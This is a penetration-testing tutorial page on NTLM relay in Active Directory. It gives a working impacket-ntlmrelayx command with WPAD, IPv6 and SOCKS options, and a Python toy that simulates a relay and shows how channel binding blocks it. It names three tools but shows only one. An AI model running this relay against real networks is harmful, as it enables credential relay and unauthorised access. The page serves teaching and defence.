Adversary-In-The-Middle

Adversary-in-the-Middle (AiTM), also known as Man-in-the-Middle (MitM), is an attack in which an adversary positions themselves between two communicating parties to intercept, monitor and potentially manipulate the traffic, typically without either party noticing.

AiTM is a popular attack path that many penetration testers attempt early in an internal penetration test against lower- to medium-maturity organisations. Many of the configurations exploited to obtain an AiTM position are Active Directory defaults, and some of the remediations can be hard to implement in practice.

I recommend reading the pages in this section to understand each tool and what it exploits, but here is an example of the three tools I run, in this specific order:

Start impacket-ntlmrelayx first, so the relay is already listening when authentication attempts start arriving: it relays the captured authentication to the hosts in the targets file and, for each successful relay, keeps the session open behind a SOCKS proxy for later use. Relaying to SMB only works against hosts that do not require SMB signing, so the targets file should be built from those hosts.

Linux (Attacker)
# -6            listen on IPv6 as well, so victims reaching the relay over IPv6 are served
# -wh           serve a WPAD file naming this host as the proxy, to collect proxy authentication
# -tf           file with one target per line (bare hostname = SMB; ldap://, http:// etc. select other protocols)
# -of           base filename for captured hashes (suffixed _ntlm / _ntlmv2)
# -socks        start the SOCKS proxy that holds relayed sessions open
# -smb2support  accept SMB2 from connecting clients
impacket-ntlmrelayx -6 -wh [hostname].[domain] -tf [targets] -of socks -socks -smb2support
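To make concrete what ntlmrelayx exploits, here is a toy relay written for this page (an added example, not impacket code or the author's). It models the NTLMv2 exchange between a victim, a relay and a target in a single process instead of over SMB/HTTP: the target's challenge is handed to the victim as if it were the relay's own, and the victim's answer is forwarded back unchanged, so the relay is authenticated as the victim without ever knowing a password or hash. The account name, domain, password and host names are constructed, and the `bind_target` flag is a simplified stand-in for Extended Protection / channel binding, not a real protocol field; a pure-Python MD4 is included because hashlib often lacks it on OpenSSL 3.

```python
"""Toy model of the NTLM relay that ntlmrelayx performs.

Added example for this page, not impacket code. Victim, relay and target run
in one process and hand each other the NTLMv2 values directly instead of over
SMB/HTTP. Account, domain, password and host names are constructed test data;
bind_target is a simplified stand-in for Extended Protection / channel binding.
"""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (for the NT hash); hashlib lacks md4 on many OpenSSL 3 builds."""
    rot = lambda x, s: ((x << s) | (x >> (32 - s))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3k = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            if i < 16:
                fn, k, s, t = f, i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                fn, k, s, t = g, (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                fn, k, s, t = h, r3k[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, rot((a + fn(b, c, d) + x[k] + t) & MASK, s), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """MS-NLMP NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof(ntowf: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: the only part of the response tied to the server's challenge."""
    return hmac.new(ntowf, server_challenge + blob, hashlib.md5).digest()


class Target:
    """Host the attacker wants a session on. A DC would do the hash lookup; here it is local."""

    def __init__(self, name: str, nt_hashes: dict, bind_target: bool = False):
        self.name, self.nt_hashes, self.bind_target = name, nt_hashes, bind_target

    def challenge(self) -> bytes:
        self.server_challenge = os.urandom(8)
        return self.server_challenge

    def authenticate(self, user: str, domain: str, blob: bytes, proof: bytes) -> bool:
        if user not in self.nt_hashes:
            return False
        # Hardened target: the blob names the service the client believed it was talking
        # to, and a mismatch is refused (modelled stand-in for EPA / channel binding).
        if self.bind_target and blob[8:] != self.name.encode():
            return False
        key = ntowf_v2(self.nt_hashes[user], user, domain)
        return hmac.compare_digest(nt_proof(key, self.server_challenge, blob), proof)


class Victim:
    """Workstation that authenticates to whichever host it was steered to (e.g. via WPAD)."""

    def __init__(self, user: str, domain: str, password: str):
        self.user, self.domain, self.nt = user, domain, nt_hash(password)

    def respond(self, service_name: str, server_challenge: bytes):
        blob = os.urandom(8) + service_name.encode()  # client challenge + name it connected to
        key = ntowf_v2(self.nt, self.user, self.domain)
        return self.user, self.domain, blob, nt_proof(key, server_challenge, blob)


def relay(victim: Victim, attacker_host: str, target: Target) -> bool:
    """One ntlmrelayx-style relay: pass the challenge one way, the answer the other."""
    chal = target.challenge()                   # attacker opens a session to the target
    auth = victim.respond(attacker_host, chal)  # victim answers the target's challenge
    return target.authenticate(*auth)           # forwarded unchanged; no secret needed


if __name__ == "__main__":
    victim = Victim("jdoe", "CORP", "Winter2024!")  # constructed account
    hashes = {"jdoe": nt_hash("Winter2024!")}
    print("relay to plain target:", relay(victim, "attacker.corp.local", Target("fileserver", hashes)))
    print("relay to bound target:", relay(victim, "attacker.corp.local", Target("fileserver", hashes, True)))
```

The plain target accepts the relayed answer because nothing in a bare NTLMv2 response ties it to the host the victim actually connected to; the bound target refuses it for exactly that reason, which is the property SMB signing and Extended Protection add in real deployments and why a targets file should be restricted to hosts lacking them.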
